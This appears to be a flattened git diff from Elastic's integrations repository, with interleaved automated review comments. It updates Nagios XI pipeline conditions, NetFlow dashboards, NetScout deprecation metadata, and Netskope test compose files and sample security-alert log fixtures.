@@ -601,13 +613,13 @@ processors:
 override: true
 ignore_empty_value: true
 ignore_failure: true
- if: ctx?.nagios_xi?.service?.check_command?.contains("check_local_disk")
+ if: ctx.nagios_xi?.service?.check_command?.contains("check_local_disk") == true
 - dissect:
 field: nagios_xi.service.root_partition.performance_data
 pattern: "%{?}=%{nagios_xi.service.root_partition.used_space}M%{};%{};%{};%{};%{nagios_xi.service.root_partition.total_space}"
 ignore_missing: true
 ignore_failure: true
- if: ctx?.nagios_xi?.service?.containsKey("root_partition")
+ if: ctx.nagios_xi?.service?.containsKey("root_partition") == true
 - convert:
 field: nagios_xi.service.root_partition.total_space
 type: long
@@ -620,7 +632,7 @@ processors:
 ignore_failure: true
 - script:
 source: |
- if(ctx?.nagios_xi?.service?.containsKey("root_partition")) {
+ if(ctx.nagios_xi?.service?.containsKey("root_partition") == true) {
 ctx.nagios_xi.service.root_partition.free_space = ctx.nagios_xi.service.root_partition.total_space - ctx.nagios_xi.service.root_partition.used_space
 }
 ignore_failure: true
@@ -629,22 +641,32 @@ processors:
 value: nagios_xi.root_partition
 ignore_empty_value: true
 ignore_failure: true
- if: ctx?.nagios_xi?.service?.containsKey("root_partition")
+ if: ctx.nagios_xi?.service?.containsKey("root_partition") == true
 - set:
 field: event.dataset
 value: nagios_xi.custom
 ignore_empty_value: true
 ignore_failure: true
- if: '!(ctx?.nagios_xi?.service?.containsKey("current_users") || ctx?.nagios_xi?.service?.containsKey("current_load") || ctx?.nagios_xi?.service?.containsKey("ssh") || ctx?.nagios_xi?.service?.containsKey("ping") || ctx?.nagios_xi?.service?.containsKey("swap_usage") || ctx?.nagios_xi?.service?.containsKey("process") || ctx?.nagios_xi?.service?.containsKey("http") || ctx?.nagios_xi?.service?.containsKey("root_partition"))'
+ if: >-
+ ctx.nagios_xi?.service == null || !(
+ ctx.nagios_xi.service.containsKey("current_users") ||
+ ctx.nagios_xi.service.containsKey("current_load") ||
+ ctx.nagios_xi.service.containsKey("ssh") ||
+ ctx.nagios_xi.service.containsKey("ping") ||
+ ctx.nagios_xi.service.containsKey("swap_usage") ||
+ ctx.nagios_xi.service.containsKey("process") ||
+ ctx.nagios_xi.service.containsKey("http") ||
+ ctx.nagios_xi.service.containsKey("root_partition")
+ )
 - set:
 copy_from: nagios_xi.service.temp
 field: nagios_xi.service.custom
 override: true
 ignore_empty_value: true
 ignore_failure: true
- if: ctx?.event?.dataset?.contains("nagios_xi.custom")
-
+ if: ctx.event?.dataset?.contains("nagios_xi.custom") == true
+
 - set:
 field: event.kind
 value: metric
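Review bot: The rewritten `event.dataset` condition also fires when `ctx.nagios_xi?.service == null`, so an event that carries no `nagios_xi.service` object at all is now relabelled `nagios_xi.custom`, whereas the old single-expression form would presumably have failed on the null and, with `ignore_failure: true`, left `event.dataset` untouched. If that relabelling is intended, a comment such as `# an event with no nagios_xi.service object is also treated as a custom check` above the `if:` would make it deliberate rather than incidental; if not, `ctx.nagios_xi?.service != null && !(` keeps the previous outcome. The processors list continues outside the hunk.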
@@ -681,7 +703,7 @@ processors: - remove: field: event.original - if: "ctx?.tags == null || !(ctx.tags.contains('preserve_original_event'))" + if: "ctx.tags == null || !(ctx.tags.contains('preserve_original_event'))" ignore_failure: true ignore_missing: true diff --git a/packages/nagios_xi/manifest.yml b/packages/nagios_xi/manifest.yml index 4ebd15e970c..ba71585e6e5 100644 --- a/packages/nagios_xi/manifest.yml +++ b/packages/nagios_xi/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: nagios_xi title: "Nagios XI" -version: "1.2.0" +version: "1.2.1" license: basic description: Collect Logs and Metrics from Nagios XI with Elastic Agent. type: integration diff --git a/packages/netflow/changelog.yml b/packages/netflow/changelog.yml index 1732fdfd1a2..0dd1b103954 100644 --- a/packages/netflow/changelog.yml +++ b/packages/netflow/changelog.yml @@ -1,4 +1,14 @@ # newer versions go on top +- version: "2.18.0" + changes: + - description: Update package spec to 3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9235 +- version: "2.17.2" + changes: + - description: Fix duplicated names in dashboard. + type: bugfix + link: https://github.com/elastic/integrations/pull/9173 - version: "2.17.1" changes: - description: Changed owners diff --git a/packages/netflow/kibana/dashboard/netflow-38012abe-c611-4124-8497-381fcd85acc8.json b/packages/netflow/kibana/dashboard/netflow-38012abe-c611-4124-8497-381fcd85acc8.json index bcc41f40fc4..049b54287e6 100644 --- a/packages/netflow/kibana/dashboard/netflow-38012abe-c611-4124-8497-381fcd85acc8.json +++ b/packages/netflow/kibana/dashboard/netflow-38012abe-c611-4124-8497-381fcd85acc8.json @@ -2025,7 +2025,7 @@ }, { "id": "logs-*", - "name": "b0d83992-011c-4437-b57a-7afd050ad8bf", + "name": "d04d29f3-5b7b-49b9-b689-5af89eb5a2f7", "type": "index-pattern" } ], 
@@ -2044,7 +2044,7 @@ "9a13f784-1095-4dba-a081-720654c92d4b": { "dataType": "ip", "isBucketed": true, - "label": "Top 5 values of source.ip", + "label": "Top 5 values of destination.ip", "operationType": "terms", "params": { "exclude": [], @@ -2061,10 +2061,11 @@ "parentFormat": { "id": "terms" }, + "secondaryFields": [], "size": 5 }, "scale": "ordinal", - "sourceField": "source.ip" + "sourceField": "destination.ip" }, "ba7efcae-97de-41b4-90e9-87a0b6991363": { "dataType": "date", @@ -2115,7 +2116,7 @@ "alias": null, "disabled": false, "field": "data_stream.dataset", - "index": "b0d83992-011c-4437-b57a-7afd050ad8bf", + "index": "d04d29f3-5b7b-49b9-b689-5af89eb5a2f7", "key": "data_stream.dataset", "negate": false, "params": { @@ -2383,7 +2384,7 @@ }, { "id": "logs-*", - "name": "a7021d78-1671-440f-8d11-5257cc2729cc", + "name": "9064af87-c756-4aeb-abbd-eefa10cdb45a", "type": "index-pattern" } ], @@ -2402,7 +2403,7 @@ "9a13f784-1095-4dba-a081-720654c92d4b": { "dataType": "ip", "isBucketed": true, - "label": "Top 5 values of source.ip", + "label": "Top 5 values of destination.ip", "operationType": "terms", "params": { "exclude": [], @@ -2419,10 +2420,11 @@ "parentFormat": { "id": "terms" }, + "secondaryFields": [], "size": 5 }, "scale": "ordinal", - "sourceField": "source.ip" + "sourceField": "destination.ip" }, "ba7efcae-97de-41b4-90e9-87a0b6991363": { "dataType": "date", @@ -2467,7 +2469,7 @@ "alias": null, "disabled": false, "field": "data_stream.dataset", - "index": "a7021d78-1671-440f-8d11-5257cc2729cc", + "index": "9064af87-c756-4aeb-abbd-eefa10cdb45a", "key": "data_stream.dataset", "negate": false, "params": { @@ -3107,7 +3109,7 @@ }, { "id": "logs-*", - "name": "0263d326-434a-42ce-af58-757f4bfef004", + "name": "4e849c9a-41d5-48e9-84ac-48bc039aed93", "type": "index-pattern" } ], 
@@ -3199,7 +3201,7 @@ "alias": null, "disabled": false, "field": "data_stream.dataset", - "index": "0263d326-434a-42ce-af58-757f4bfef004", + "index": "4e849c9a-41d5-48e9-84ac-48bc039aed93", "key": "data_stream.dataset", "negate": false, "params": { @@ -3295,7 +3297,7 @@ }, { "id": "logs-*", - "name": "35355396-26a5-49bc-97af-8d44e2e324e4", + "name": "80d24562-0746-4a7f-81af-b189b2e7f4d6", "type": "index-pattern" } ], @@ -3355,13 +3357,13 @@ "customLabel": true, "dataType": "number", "isBucketed": false, - "label": "Packets", + "label": "Bytes", "operationType": "sum", "params": { "emptyAsNull": true }, "scale": "ratio", - "sourceField": "network.packets" + "sourceField": "network.bytes" } }, "incompleteColumns": {} @@ -3381,7 +3383,7 @@ "alias": null, "disabled": false, "field": "data_stream.dataset", - "index": "35355396-26a5-49bc-97af-8d44e2e324e4", + "index": "80d24562-0746-4a7f-81af-b189b2e7f4d6", "key": "data_stream.dataset", "negate": false, "params": { @@ -3473,7 +3475,7 @@ }, { "id": "logs-*", - "name": "a8c52318-586e-4c82-bf05-6c1d94319c21", + "name": "8ac4f320-dae9-4d95-8f97-bb0c06ff17d7", "type": "index-pattern" } ], @@ -3559,7 +3561,7 @@ "alias": null, "disabled": false, "field": "data_stream.dataset", - "index": "a8c52318-586e-4c82-bf05-6c1d94319c21", + "index": "8ac4f320-dae9-4d95-8f97-bb0c06ff17d7", "key": "data_stream.dataset", "negate": false, "params": { @@ -3646,7 +3648,7 @@ "version": 1 }, "coreMigrationVersion": "8.7.1", - "created_at": "2023-07-19T09:29:25.515Z", + "created_at": "2024-02-15T15:12:45.659Z", "id": "netflow-38012abe-c611-4124-8497-381fcd85acc8", "migrationVersion": { "dashboard": "8.7.0" @@ -3804,7 +3806,7 @@ }, { "id": "logs-*", - "name": "4225eddd-d189-410e-ad6a-c445a7c4abef:b0d83992-011c-4437-b57a-7afd050ad8bf", + "name": "4225eddd-d189-410e-ad6a-c445a7c4abef:d04d29f3-5b7b-49b9-b689-5af89eb5a2f7", "type": "index-pattern" }, { 
@@ -3824,7 +3826,7 @@ }, { "id": "logs-*", - "name": "b7f176ff-368c-4cee-b2bf-1733bf0d670f:a7021d78-1671-440f-8d11-5257cc2729cc", + "name": "b7f176ff-368c-4cee-b2bf-1733bf0d670f:9064af87-c756-4aeb-abbd-eefa10cdb45a", "type": "index-pattern" }, { @@ -3864,7 +3866,7 @@ }, { "id": "logs-*", - "name": "0a3aaeea-585e-4486-8371-777c827480b4:0263d326-434a-42ce-af58-757f4bfef004", + "name": "0a3aaeea-585e-4486-8371-777c827480b4:4e849c9a-41d5-48e9-84ac-48bc039aed93", "type": "index-pattern" }, { @@ -3874,7 +3876,7 @@ }, { "id": "logs-*", - "name": "a22d6b0c-165f-43f4-adae-72e575f31b5c:35355396-26a5-49bc-97af-8d44e2e324e4", + "name": "a22d6b0c-165f-43f4-adae-72e575f31b5c:80d24562-0746-4a7f-81af-b189b2e7f4d6", "type": "index-pattern" }, { @@ -3884,7 +3886,7 @@ }, { "id": "logs-*", - "name": "4025844a-48f0-4e53-93b2-7245df236e0f:a8c52318-586e-4c82-bf05-6c1d94319c21", + "name": "4025844a-48f0-4e53-93b2-7245df236e0f:8ac4f320-dae9-4d95-8f97-bb0c06ff17d7", "type": "index-pattern" } ], diff --git a/packages/netflow/manifest.yml b/packages/netflow/manifest.yml index 6b3ba671429..e26f96efbdd 100644 --- a/packages/netflow/manifest.yml +++ b/packages/netflow/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.3" name: netflow title: NetFlow Records -version: "2.17.1" +version: "2.18.0" description: Collect flow records from NetFlow and IPFIX exporters with Elastic Agent. type: integration categories: diff --git a/packages/netscout/_dev/deploy/docker/docker-compose.yml b/packages/netscout/_dev/deploy/docker/docker-compose.yml index 0a4f54a4a23..09e3dfe189a 100644 --- a/packages/netscout/_dev/deploy/docker/docker-compose.yml +++ b/packages/netscout/_dev/deploy/docker/docker-compose.yml 
@@ -7,14 +7,12 @@ services:
- ${SERVICE_LOGS_DIR}:/var/log command: /bin/sh -c "cp /sample_logs/* /var/log/" netscout-sightline-udp:
- image: akroh/stream:v0.2.0
+ image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro
- entrypoint: /bin/bash
- command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9524 -p=udp /sample_logs/netscout-sightline-*.log"
+ command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9524 -p=udp /sample_logs/netscout-sightline-*.log netscout-sightline-tcp:
- image: akroh/stream:v0.2.0
+ image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro
- entrypoint: /bin/bash
- command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9524 -p=tcp /sample_logs/netscout-sightline-*.log"
+ command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9524 -p=tcp /sample_logs/netscout-sightline-*.log
diff --git a/packages/netscout/changelog.yml b/packages/netscout/changelog.yml
index 24cd4dddcf3..1161d3949db 100644
--- a/packages/netscout/changelog.yml
+++ b/packages/netscout/changelog.yml
@@ -1,4 +1,9 @@ # newer versions go on top
+- version: "0.20.0"
+ changes:
+ - description: Deprecate package.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9074 - version: "0.19.1" changes: - description: Fix exclude_files pattern.
diff --git a/packages/netscout/manifest.yml b/packages/netscout/manifest.yml
index 8295119fefc..77fee095b6a 100644
--- a/packages/netscout/manifest.yml
+++ b/packages/netscout/manifest.yml 
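Review bot: The new `image:` lines pin the stream tool only by a mutable tag, `docker.elastic.co/observability/stream:v0.15.0`, so whatever the registry resolves that tag to at run time is what executes against the test stack; for a supply-chain-conscious test harness the tag should be accompanied by a digest, `image: docker.elastic.co/observability/stream:v0.15.0@sha256:<digest>`, which also makes the system test reproducible. Moving off the personal `akroh/stream` Docker Hub image onto the Elastic-owned registry is the right direction and is what makes digest pinning practical. The commit also drops the explicit `entrypoint: /bin/bash` and relies on the image's default entrypoint to run `log ...`; presumably that entrypoint is the `stream` binary in v0.15.0, but that is worth confirming against the image rather than assumed.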
@@ -1,12 +1,12 @@ format_version: 2.7.0 name: netscout
-title: Arbor Peakflow SP Logs
-version: "0.19.1"
-description: Collect and parse logs from Netscout Arbor Peakflow SP with Elastic Agent.
+title: Arbor Peakflow SP Logs (Deprecated)
+version: "0.20.0"
+description: Deprecated. Netscout Arbor Peakflow SP is no longer supported. categories: ["security", "network"] type: integration conditions:
- kibana.version: "^7.14.1 || ^8.0.0"
+ kibana.version: "^8.8.0" policy_templates: - name: sightline title: Arbor Peakflow SP
diff --git a/packages/netskope/_dev/deploy/docker/docker-compose.yml b/packages/netskope/_dev/deploy/docker/docker-compose.yml
index 9b3cb7fe09f..bf868247965 100644
--- a/packages/netskope/_dev/deploy/docker/docker-compose.yml
+++ b/packages/netskope/_dev/deploy/docker/docker-compose.yml
@@ -1,14 +1,12 @@ version: "2.3" services: netskope-alerts-tcp:
- image: docker.elastic.co/observability/stream:v0.8.0
+ image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro
- entrypoint: /bin/bash
- command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9020 -p=tcp /sample_logs/alerts.log"
+ command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9020 -p=tcp /sample_logs/alerts.log netskope-events-tcp:
- image: docker.elastic.co/observability/stream:v0.8.0
+ image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro
- entrypoint: /bin/bash
- command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9021 -p=tcp /sample_logs/events.log"
+ command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9021 -p=tcp /sample_logs/events.log
diff --git a/packages/netskope/_dev/deploy/docker/sample_logs/alerts.log b/packages/netskope/_dev/deploy/docker/sample_logs/alerts.log
index 97b7363cdfb..474ca74c0ed 100644
--- a/packages/netskope/_dev/deploy/docker/sample_logs/alerts.log 
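Review bot: The deprecation release narrows `kibana.version` from `^7.14.1 || ^8.0.0` to `^8.8.0`, so stacks older than 8.8 will never be offered 0.20.0 and their users will not see the `(Deprecated)` title or the new description; they simply stay on 0.19.1 with no signal that the package is no longer supported. If the narrowing is deliberate, for example to stop new installs on old stacks, a comment next to the constraint saying so would help, e.g. `# Deprecated: published only for 8.8+; older stacks keep the last supported release.`; otherwise keeping the previous constraint lets the deprecation notice reach every installed version. The same `stream` image-tag bump as in the netscout compose file appears in the netskope hunk below and carries the same digest-pinning consideration.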
+++ b/packages/netskope/_dev/deploy/docker/sample_logs/alerts.log 
@@ -5,4 +5,4 @@ {"event":{"id":"045b4a05e63667d3b25279e1"},"netskope":{"alerts":{"insertion_epoch_timestamp":1643398205,"access_method":"Client","acked":"false","is_alert":"yes","alert":{"name":"example.com/images/favicon.ico","type":"malsite"},"type":"malsite","app":{"session":{"id":"5227418687549615144"},"category":"Prohibited Sites"},"browser":{"session":{"id":"3264708578582859888"}},"category":{"name":"Prohibited Sites"},"cci":"0","ccl":"unknown","connection":{"id":"0"},"count":1,"device":{"name":"Windows Device","classification":"unmanaged"},"is_malicious":"yes","malsite":{"category":"['Malicious Site']","country":"IN","id":"c4634b403efff5e7ae84eb59","ip_host":"45.114.142.143","latitude":17.3752803802,"longitude":78.4744415283,"region":"Telangana","severity":{"level":"med"}},"managed":{"app":"no"},"netskope_pop":"US-SFO1","organization":{"unit":"null"},"other":{"categories":"['Prohibited Sites', 'All Categories', 'Security Risk - Compromised/malicious sites', 'Security Risk - Malware Distribution Point', 'Security Risk']"},"page":{"url":"example.com/images/favicon.ico","site":"example"},"severity":{"level":"unknown","level_id":1},"site":"example","source":{"time":"Fri Jan 28 11:24:00 2022"},"telemetry":{"app":"example"},"threat":{"match":{"field":"url","value":"example.com/images/favicon.ico"},"source":{"id":"1"}},"traffic":{"type":"Web"},"transaction":{"id":"4272771780484953037"},"url":"example.com/images/favicon.ico","user":{"group":"null","ip":"81.2.69.143"},"action":"block","ip":{"protocol":"TCP"},"notify":{"template":"1.html"},"policy":{"name":"[Access Control] Prohibited Sites"},"referer":"https://examplesecuritycheck.com/"}},"user_agent":{"name":"Chrome","os":{"name":"Windows 10","version":"Windows 
10"}},"destination":{"geo":{"country_iso_code":"IN","location":{"lat":17.3752803802,"lon":78.4744415283},"city_name":"Hyderabad","region_name":"Telangana","timezone":"Asia/Kolkata","postal_code":"N/A"},"ip":"81.2.69.143","address":"81.2.69.143"},"host":{"hostname":"Surface"},"network":{"protocol":"HTTPS/1.1"},"source":{"geo":{"country_iso_code":"US","location":{"lat":32.7994,"lon":-117.1686},"city_name":"San Diego","region_name":"California","timezone":"America/Los_Angeles","postal_code":"92111"},"ip":"81.2.69.143","address":"81.2.69.143"},"@timestamp":"2022-01-28T19:25:02.000Z","user":{"email":{"1":"user@example.com","2":"user@example.com","3":"user@example.com"}}} {"event":{"id":"9c4f8947f6326ff0ad79f4a3"},"netskope":{"alerts":{"insertion_epoch_timestamp":1643398226,"access_method":"Client","acked":"false","action":"Detection","activity":{"name":"Download"},"is_alert":"yes","alert":{"name":"Document-PDF.Exploit.CVE-2018-49","type":"nspolicy"},"type":"Malware","app":{"name":"examplesecuritycheck","app_name":"examplesecuritycheck","session":{"id":"5227418687549615144"},"category":"Security"},"category":{"name":"Security"},"ccl":"unknown","connection":{"id":"0"},"count":1,"detection":{"engine":"example Threat Intelligence"},"file":{"id":"9fd78f86b33b566883ede8de9bc92a59"},"instance":{"name":"null"},"malware":{"id":"78e527c7a66ea6bf74d2ca7e335a5685","name":"Document-PDF.Exploit.CVE-2018-49","profile":"5","severity":"high","type":"Trojan"},"ml_detection":"false","object":{"name":"9","type":"File"},"organization":{"unit":"null"},"other":{"categories":"['All Categories', 'Security']"},"scanner_result":"malicious","severity":{"level":"High","id":"3"},"site":"examplesecuritycheck","title":"9","traffic":{"type":"Web"},"tss":{"mode":"inline"},"user":{"group":"null"},"browser":{"session":{"id":"3264708578582859888"}},"device":{"name":"Windows 
Device","classification":"unmanaged"},"destination":{"geoip_src":1},"flow_status":"closed","ip":{"protocol":"TCP"},"ns_device_uid":"F546DEC0-AFF8-F1D5-1759-6721396ED3F8","page":{"url":"examplesecuritycheck.com/tests/execute/9","site":"examplesecuritycheck"},"referer":"https://examplesecuritycheck.com/","source":{"geoip_src":2,"time":"Fri Jan 28 11:25:00 2022"},"transaction":{"id":"8479039290096064292"},"is_web_universal_connector":"yes"}},"file":{"name":"9","size":1521,"mime_type":{"1":"application\\\\/vnd.apps.document"}},"threat":{"indicator":{"file":{"hash":{"md5":"e525a5e5570041dcae34fc342d3712da","sha256":"7d9a763411c73a4c7f85eb1f3cf04d6693696588b3fb3c98e8982bbe4245920c"}}}},"@timestamp":"2022-01-28T19:25:20.000Z","user":{"email":{"1":"user@example.com","2":"user@example.com","3":"user@example.com","4":"user@example.com"}},"user_agent":{"name":"Chrome","version":"97.0.4692.99","os":{"name":"Windows 10","version":"Windows 10"}},"destination":{"geo":{"country_iso_code":"US","location":{"lat":37.405991,"lon":-122.078514},"city_name":"Mountain View","region_name":"California","timezone":"America/Los_Angeles","postal_code":"N/A"},"ip":"81.2.69.143","address":"81.2.69.143"},"host":{"hostname":"Jenga-Surface"},"source":{"geo":{"location":{"lat":32.7994,"lon":-117.1686},"city_name":"San Diego","region_name":"California","timezone":"America/Los_Angeles","postal_code":"92111","country_iso_code":"US"},"ip":"81.2.69.143","address":"81.2.69.143"}} {"event":{"id":"b999bebb17c193b3350f16b3"},"netskope":{"alerts":{"insertion_epoch_timestamp":1643512589,"access_method":"Reverse Proxy","acked":"false","action":"anomaly_detection","activity":{"name":"Delete"},"is_alert":"yes","alert":{"id":"e6326f36925eb2959f0938315dbd3503","name":"Bulk Delete","type":"nspolicy"},"app":{"name":"SomeApp","category":"Cloud Storage"},"category":{"name":"Cloud Storage"},"cci":"52","ccl":"low","count":1,"device":{"name":"Mac 
Device","classification":"managed"},"destination":{"geoip_src":2},"event":{"type":"sequence"},"event_source_channel":"application","from":{"storage":"kandji-prd-managed-library-items"},"managed":{"app":"no"},"management":{"id":"918C405E48DD5115862A39150E5C7E06"},"ns_device_uid":"740E2C56-31F5-190E-F76F-CEC7D82710FE","object":{"name":"TNVaXVdogPIwDHZL","type":"Folder"},"organization":{"unit":"example.local/example/Active Users"},"orig_ty":"nspolicy","other":{"categories":"null"},"page":{"url":"kandji-prd-managed-library-items.example.com","site":"Some App"},"policy":{"name":"Bulk Delete","actions":"['Delete']"},"profile":{"id":"Bulk Delete"},"severity":{"level":"medium"},"site":"F-Secure VPN+","source":{"geoip_src":1},"telemetry":{"app":"none"},"threshold":{"value":100,"time":3600},"traffic":{"type":"CloudApp"},"transaction":{"id":"2401226170271289300"},"type":"uba","url":"zCyaZZIAMFPHEibU","user":{"ip":"81.2.69.143"}}},"user_agent":{"name":"Native","os":{"name":"Mojave","version":"Mojave"}},"destination":{"geo":{"country_iso_code":"US","location":{"lat":45.8234,"lon":-119.7257},"city_name":"Boardman","region_name":"Oregon","postal_code":"97818"},"address":"81.2.69.143","ip":"81.2.69.143"},"file":{"size":133067189,"mime_type":{"1":"application\\\\/vnd.apps.document"}},"host":{"hostname":"C02ZL3MPLVDR"},"source":{"geo":{"country_iso_code":"FR","location":{"lat":48.883411,"lon":2.23894},"city_name":"Puteaux","region_name":"Ile-de-France"},"address":"81.2.69.143","ip":"81.2.69.143"},"@timestamp":"2022-01-30T00:58:52.000Z","user":{"email":{"1":"userdte471@test.example.com","2":"USERDTE471@test.example.com","3":"USERDTE471@test.example.com"},"group":{"name":"null"}}} -{"event":{"id":"47eccb9569fe50460ad1200f"},"netskope":{"alerts":{"insertion_epoch_timestamp":1642755526,"acked":"false","is_alert":"yes","alert":{"name":"cit0day - download1.mios.com","type":"breach"},"type":"Compromised Credential","breach":{"date":1601942400,"description":"In September 2020, a threat 
actor began sharing the millions of stolen credentials that were associated with a prominent Dark Web credentials service shut down by US federal authorites in August 2020. The stolen credentials represent hundreds of websites and hundreds of millions of users and their associated passwords affected by the illegal antics of the threat actor who managed the now defunct Dark Web forum. Users and companies from all over the world were affected by these various breaches. This file contains the download1.mios.com accounts dump.","id":"bc6952df4c61b469cf4a47f17d0ea384","media_references":"null","score":40,"target_references":"null"},"category":{"name":"null"},"cci":"0","ccl":"unknown","count":1,"email":{"source":"Active"},"external":{"email":1},"matched":{"username":"user@example.com"},"organization":{"unit":"null"},"other":{"categories":"null"},"user":{"group":"null"},"app":{"category":"null"}}},"@timestamp":"2022-01-19T21:39:15.000Z","user":{"email":{"1":"user@example.com","2":"user@example.com","3":"user@example.com"}}} \ No newline at end of file +{"event":{"id":"47eccb9569fe50460ad1200f"},"netskope":{"alerts":{"insertion_epoch_timestamp":1642755526,"acked":"false","is_alert":"yes","alert":{"name":"cit0day - download1.mios.com","type":"breach"},"type":"Compromised Credential","breach":{"date":1601942400,"description":"In September 2020, a threat actor began sharing the millions of stolen credentials that were associated with a prominent Dark Web credentials service shut down by US federal authorites in August 2020. The stolen credentials represent hundreds of websites and hundreds of millions of users and their associated passwords affected by the illegal antics of the threat actor who managed the now defunct Dark Web forum. Users and companies from all over the world were affected by these various breaches. 
This file contains the download1.mios.com accounts dump.","id":"bc6952df4c61b469cf4a47f17d0ea384","media_references":"null","score":40,"target_references":"null"},"category":{"name":"null"},"cci":"0","ccl":"unknown","count":1,"email":{"source":"Active"},"external":{"email":1},"matched":{"username":"user@example.com"},"organization":{"unit":"null"},"other":{"categories":"null"},"user":{"group":"null"},"app":{"category":"null"}}},"@timestamp":"2022-01-19T21:39:15.000Z","user":{"email":{"1":"user@example.com","2":"user@example.com","3":"user@example.com"}}} diff --git a/packages/netskope/_dev/deploy/docker/sample_logs/events.log b/packages/netskope/_dev/deploy/docker/sample_logs/events.log index c77e2a79d64..bb19abe4906 100644 --- a/packages/netskope/_dev/deploy/docker/sample_logs/events.log +++ b/packages/netskope/_dev/deploy/docker/sample_logs/events.log 
@@ -2,4 +2,4 @@ {"netskope":{"events":{"event_type":"network","destination":{"geoip":{"source":1}},"insertion":{"timestamp":1643512690},"access_method":"Client","app":{"name":"[app-name]","category":"null"},"category":{"name":"null"},"ccl":"unknown","count":1,"device":{"type":"Windows Device"},"ip":{"protocol":"TCP"},"numbytes":92653,"organization_unit":"null","policy":{"name":"hEfQoOPfTWYzbYfC"},"session":{"packets":71},"site":"[app-test]","total_packets":128,"traffic":{"type":"PrivateApp"},"tunnel":{"id":"1840937979","type":"NPA","up_time":71},"type":"network","source":{"geoip_src":2},"user":{"ip":"89.160.20.112"}}},"event":{"action":"allow","id":"8d61df5a9a8a2709c21e6dfb"},"destination":{"geo":{"country_iso_code":"FR","location":{"lat":48.883411,"lon":2.23894},"city_name":"Puteaux","region_name":"Ile-de-France"},"address":"81.2.69.143","ip":"81.2.69.143","port":80},"client":{"bytes":88028,"packets":70},"user_agent":{"os":{"name":"Windows","version":"10.0 (1809)"}},"network":{"protocol":"Http"},"server":{"bytes":4625,"packets":58},"source":{"address":"81.2.69.143","ip":"81.2.69.143","port":16,"geo":{"country_iso_code":"NL","location":{"lat":52.3759,"lon":4.8975},"city_name":"Amsterdam","region_name":"North Holland","postal_code":"1012"}},"@timestamp":"2022-01-30T00:58:52.000Z","user":{"email":{"1":"userdte471@example.com","2":"USERDTE471@example.com","3":"USERDTE471@example.com"},"group":{"name":"null"}}} {"netskope":{"events":{"event_type":"audit","insertion":{"timestamp":1643521800},"audit":{"log":{"event":"Login Successful"}},"ccl":"unknown","count":1,"organization_unit":"null","severity":{"level":"2"},"supporting_data":"{'data_type': 'user', 'data_values': ['71.198.199.251', 'user@example.com']}","type":"admin_audit_logs"}},"event":{"id":"c198aee5561d930a120e4fb4"},"@timestamp":"2022-01-30T05:44:59.000Z","user":{"email":{"1":"user@example.com","2":"user@example.com"}}} 
{"netskope":{"events":{"event_type":"page","insertion":{"timestamp":1643512735},"access_method":"Secure Forwarder","app":{"name":"SomeApp","category":"Cloud Storage"},"category":{"name":"Cloud Storage"},"cci":"72","ccl":"medium","connection":{"duration":41,"end_time":1601970462,"start_time":1601970421},"count":1,"device":{"type":"Windows Device"},"domain":"YFzrXohPeIcanEwg","destination":{"geoip":{"source":1}},"numbytes":217350,"organization_unit":"null","page":"www.example.com","request":{"count":14},"response":{"count":14,"content":{"length":174053,"type":"text/html"}},"severity":{"level":"unknown"},"site":"SomeSite","source":{"geoip_src":2},"traffic":{"type":"CloudApp"},"user":{"generated":"True","ip":"89.160.20.112"},"url":"ABwagJUWXsoBHcFJ","is_bypass_traffic":"no","http_transaction_count":12,"suppression":{"end_time":1601970439,"start_time":1601970424},"transaction":{"id":"0"}}},"event":{"id":"fd54bdb5916df42dc55712a4"},"user_agent":{"name":"Firefox","version":"85.0.4183.121","os":{"name":"Windows 10","version":"Windows 10"},"original":"Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:95.0) Gecko/20100101 Firefox/95.0"},"client":{"bytes":26538},"destination":{"geo":{"country_iso_code":"FR","location":{"lat":48.883411,"lon":2.23894},"city_name":"Puteaux","region_name":"Ile-de-France","timezone":"Asia/Kolkata"},"address":"81.2.69.143","ip":"81.2.69.143","port":443},"server":{"bytes":190812},"source":{"geo":{"country_iso_code":"IN","location":{"lat":12.9634,"lon":77.5855},"city_name":"Bengaluru","region_name":"Karnataka","timezone":"Asia/Kolkata","postal_code":"560002"},"address":"81.2.69.143","ip":"81.2.69.143"},"@timestamp":"2022-01-30T00:58:52.000Z","user":{"email":{"1":"userdte471@example.com","2":"USERDTE471@example.com","3":"foo@bar.com"},"group":{"name":"null"}},"host":{"hostname":"DESKTOP-WORKGROUP"}} 
-{"@timestamp":"2021-12-24T00:29:56.000Z","event.id":"613ee55ec9d868fc47654a73","netskope":{"events":{"event_type":"infrastructure","severity":{"level":"high"},"alarm":{"name":"No_events_from_device","description":"Events from device not received in the last 24 hours"},"device":{"name":"device-1"},"metric_value":43831789,"serial":"FFFFFFFFFFFFFFFF","supporting_data":"abc"}}} \ No newline at end of file +{"@timestamp":"2021-12-24T00:29:56.000Z","event.id":"613ee55ec9d868fc47654a73","netskope":{"events":{"event_type":"infrastructure","severity":{"level":"high"},"alarm":{"name":"No_events_from_device","description":"Events from device not received in the last 24 hours"},"device":{"name":"device-1"},"metric_value":43831789,"serial":"FFFFFFFFFFFFFFFF","supporting_data":"abc"}}} diff --git a/packages/netskope/changelog.yml b/packages/netskope/changelog.yml index 397bf05c394..47a75faeb2c 100644 --- a/packages/netskope/changelog.yml +++ b/packages/netskope/changelog.yml @@ -1,4 +1,24 @@ # newer versions go on top +- version: "1.18.0" + changes: + - description: Added support for custom TCP options. + type: enhancement + link: https://github.com/elastic/integrations/pull/9605 +- version: "1.17.2" + changes: + - description: Add on_failure in json processor and handle the string type value for user.email field + type: bugfix + link: 